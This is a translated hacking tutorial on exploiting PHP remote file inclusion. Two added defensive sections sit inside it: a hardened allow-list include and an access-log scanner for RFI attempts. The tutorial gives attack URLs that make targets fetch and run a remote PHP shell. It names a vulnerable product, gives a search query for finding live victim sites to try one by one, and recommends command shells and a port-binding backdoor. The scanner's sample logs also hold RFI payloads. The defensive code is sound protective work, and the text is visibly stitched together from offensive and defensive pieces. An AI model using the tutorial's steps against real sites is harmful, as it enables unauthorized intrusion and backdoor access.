Using remote file inclusion vulnerabilities

**************************************
AUTHOR: CRACKLOVE
EMAIL: CRACKLOVE#zj.com
Home: n/a, maybe down
**************************************

1) What is a remote file inclusion vulnerability?

Let us first take a look at the following code:

    <?php
    include($page);
    ?>

Because $page is not filtered at all, it is not restricted to files on the local machine: it can just as well point at a remote server. We can pass a file on a remote server as the $page parameter, and the remote file is then executed with the web server's privileges.

2) First use of the vulnerability

Suppose the index.php of some site contains the following code:

    <?php
    include($page);
    ?>

We can submit:

    http://siteurl.tld/index.php?page=http://remoteserver/filename

Suppose the file is warez.php and its content is:

    <?php
    system("ls /tmp/");
    ?>

This downloads warez.php to the target and executes it! Put plainly, it lists the files under /tmp.

3) Practical exercise

Enough talk, now let's start the exercise, hehe.

(1) Preparation:
1. A site with a remote file inclusion vulnerability
2. A PHP shell
3. A backdoor

For 1, everyone can follow the latest vulnerabilities at www.cnns.net or www.securiteam.com; there will always be some. We take the most recent one, the ArtMedic Kleinanzeigen vulnerability. In ArtMedic Kleinanzeigen, the $site variable of index.php lacks filtering, so it has a remote file inclusion vulnerability. We can therefore submit the following URL:

    http://artmedic-kleinanzeigen-url/path/index.php?site=http://phpshellurl

How to find sites running ArtMedic Kleinanzeigen? There is a tip here. First look at the program demo on the official ArtMedic Kleinanzeigen site: click any link and you are taken to http://siteurl.com/index.php?site=anzeigenmaerktestart. So? Go to google.com and search for index.php?site=anzeigenmaerktestart; almost all the sites using ArtMedic Kleinanzeigen come up, and we can try them one by one!
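The include($page) code from sections 1 and 2 next to a hardened version, added here as an example; it is not code from the article, nor from ArtMedic Kleinanzeigen. The function name safe_page_path(), the pages/ directory and the page names in ALLOWED_PAGES are assumptions made for this example:

```php
<?php
// Added example (not from the original article): the vulnerable include
// from the article beside a hardened version. safe_page_path(), the
// "pages" directory and the ALLOWED_PAGES names are assumptions.

// --- Vulnerable form, as in the article ---
// $page is taken from the request unchanged, and PHP's include() accepts
// a URL, so ?page=http://remoteserver/warez.php fetches the remote file
// and runs it with the web server's privileges.
function vulnerable_include(string $page): void
{
    include($page);
}

// --- Hardened form: map the request to one of a fixed set of files ---
// Rather than trying to filter the string, accept only names from an
// allow-list, then confirm the resolved path really lies inside PAGES_DIR.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'news', 'contact'];

function safe_page_path(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                 // "http://...", "../etc/passwd" etc. all stop here
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    // realpath() returns false for a missing file; the prefix check also
    // rejects a symlink inside pages/ that points outside it.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Request handling: unknown or unsafe names get a 404 instead of an include.
$page = $_GET['page'] ?? 'home';
$path = safe_page_path($page);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

The allow-list is the actual fix: the request value is never used as a path, it only selects one of the files the developer chose. As defence in depth, the php.ini directives allow_url_fopen and (in later PHP versions) allow_url_include can be set to Off so that include() refuses URLs server-wide, which removes the remote half of the technique even where an application still passes request data to include().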
For 2, I recommend the Data Cha0s PHP Command/SafeMode Exploit 4.1, or Angel's saphpshell or phpspy; they are full-featured. For 3, you can use a port-binding program, bind, and then telnet to the bound port. You can use the Digit-Labs connect-back door that SAN used before, but I usually use bindtty, which binds port 7474.

(2) Getting started

1. Submit:

    http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id

Explanation: cse.gif is the Data Cha0s PHP Command/SafeMode Exploit 4.1, and cmd=id is its parameter; it queries the current user's privileges. Generally it is uid=99(nobody) gid=99(nobody) groups=
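From the defender's side, the requests in step (2) leave a distinctive trace in the web server access log: a query parameter whose value is itself a URL. The following is an added example, not part of the article, that scans Apache combined-format log lines for such parameters. The log lines, IP addresses and host names in it are constructed for the example:

```php
<?php
// Added example (not from the original article): flag remote-file-inclusion
// attempts such as ?page=http://... and ?site=http://... by scanning web
// server access logs. The sample lines below are constructed; the hosts
// in them are placeholders.

// Apache "combined" log format: client IP, method, request target and
// status code are captured; the remaining fields are ignored.
const LOG_RE = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /';

// A parameter value that is itself a URL (scheme://host, including PHP
// stream wrappers such as php://input) or a scheme-relative //host is the
// signature of a remote include attempt; data: is the other URL-style
// wrapper include() will accept.
function is_remote_include_value(string $value): bool
{
    return (bool) preg_match('~^(?:[a-z][a-z0-9+.-]*:)?//|^data:~i', ltrim($value));
}

// Returns one finding per suspicious parameter in the line, each as
// ['ip' => ..., 'target' => ..., 'param' => ..., 'value' => ...],
// or an empty array for a line without findings or a line that does not parse.
function scan_log_line(string $line): array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return [];
    }
    $ip = $m[1];
    $target = $m[3];
    $qpos = strpos($target, '?');
    if ($qpos === false) {
        return [];
    }
    // Only the first '?' starts the query; a second one, as in
    // cse.gif?cmd=id, is simply part of the parameter value.
    $query = substr($target, $qpos + 1);
    parse_str($query, $params);   // splits on & and =, and percent-decodes
    $findings = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && is_remote_include_value($value)) {
            $findings[] = ['ip' => $ip, 'target' => $target, 'param' => $name, 'value' => $value];
        }
    }
    return $findings;
}

// Constructed sample log: one request copying the article's pattern, one
// benign request, and one with the scheme percent-encoded to evade naive
// string matching.
$sampleLog = [
    '203.0.113.5 - - [10/Feb/2004:21:14:02 +0800] "GET /index.php?site=http://phpshell.example/cse.gif?cmd=id HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Feb/2004:21:14:09 +0800] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Feb/2004:21:15:30 +0800] "GET /index.php?page=%68ttp%3a%2f%2fattacker.example/warez.php HTTP/1.0" 200 640 "-" "curl/7.10"',
];

foreach ($sampleLog as $line) {
    foreach (scan_log_line($line) as $f) {
        printf("%s requested %s with %s=%s\n", $f['ip'], $f['target'], $f['param'], $f['value']);
    }
}
```

Run with php on a real access_log (replace $sampleLog with file() of the log) to list every request that tried to feed include() a URL; the first and third sample lines are reported, the second is not. The check is on the decoded parameter value, so URL-encoding the scheme does not hide the attempt, and a 200 status on such a request is the case worth looking at first, since it means the include most likely succeeded.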